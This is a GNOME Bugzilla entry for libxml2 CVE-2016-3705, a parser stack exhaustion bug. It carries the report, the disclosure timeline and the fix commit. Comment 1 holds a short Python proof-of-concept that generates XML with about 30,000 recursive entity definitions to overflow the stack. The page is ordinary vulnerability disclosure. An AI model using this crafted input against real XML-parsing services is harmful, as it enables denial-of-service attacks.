After an evaluation, the migration from Bugzilla to GitLab is ongoing. Learn more about GitLab.
No new issues can be reported in GNOME Bugzilla anymore. Some older issues are still tracked here (until migrated to Gitlab).
To report an issue in a GNOME project, go to GNOME GitLab.
Do not go to GNOME Gitlab for: Bluefish, Doxygen, GnuCash, GStreamer, java-gnome, LDTP, NetworkManager, Tomboy.
Bug 765207 - (CVE-2016-3705) Stack exhaustion parsing xml in parser
(CVE-2016-3705)
Stack exhaustion parsing xml in parser
Status: RESOLVED FIXED
Product: libxml2
Classification: Platform
Component: general
git master
Other Linux
: Normal critical
: ---
Assigned To: Daniel Veillard
libxml QA maintainers
:
Depends on:
Blocks: 765977
  Show dependency tree
 
Reported: 2016-04-18 12:34 UTC by Simon Lees (SUSE)
Modified: 2016-05-22 01:29 UTC (History)
5 users (show)

See Also:
GNOME target: ---
GNOME version: ---

Attachments
Reproducer (769.36 KB, text/xml)
2016-05-03 14:03 UTC, Simon Lees (SUSE) 		  Details
Patch fix (2.26 KB, patch)
2016-05-03 14:05 UTC, Simon Lees (SUSE) 		none Details | Review
View All Add an attachment (proposed patch, testcase, etc.)

Description Simon Lees (SUSE) 2016-04-18 12:34:28 UTC 
It is possible to trigger a stack overflow using a carefully crafted invalid xml file, the stack overflow occurs before libxml2 determines the xml file is invalid. This was branched from https://bugzilla.gnome.org/show_bug.cgi?id=762100

Reproducer and Fixes are available when this bug is private.
Comment 1 Simon Lees (SUSE) 2016-05-03 13:59:48 UTC 
Generator for the repeater is below:

#!/bin/python3

f = open('repo.xml', 'w')

f.write( "<!DOCTYPE a [ ")

i = 1

while (i < 30000):
    f.write ("<!ENTITY a" + str(i) + " \"&a" + str(i+1) + ";\">")
    i = i+1

f.write("<!ENTITY a" + str(i+1) + " \"&a1;\">]> <bruces bogans=\"&a1;\">")

f.close()
Comment 2 Simon Lees (SUSE) 2016-05-03 14:03:48 UTC 
Created attachment 327227 [details]
Reproducer
Comment 3 Simon Lees (SUSE) 2016-05-03 14:05:43 UTC 
Created attachment 327229 [details] [review]
Patch fix
Comment 4 Simon Lees (SUSE) 2016-05-03 14:06:14 UTC 
This bug will shortly be disclosed on the oss-security mailing list, you can make it public now.
Comment 5 Salvatore Bonaccorso 2016-05-04 13:54:28 UTC 
FTR, this issue has been assigned CVE-2016-3705.
Comment 6 Daniel Veillard 2016-05-22 01:29:40 UTC 
Fix commited at:

https://git.gnome.org/browse/libxml2/commit/?id=8f30bdff69edac9075f4663ce3b56b0c52d48ce6


  thanks,

Daniel
Note You need to log in before you can comment on or make changes to this bug.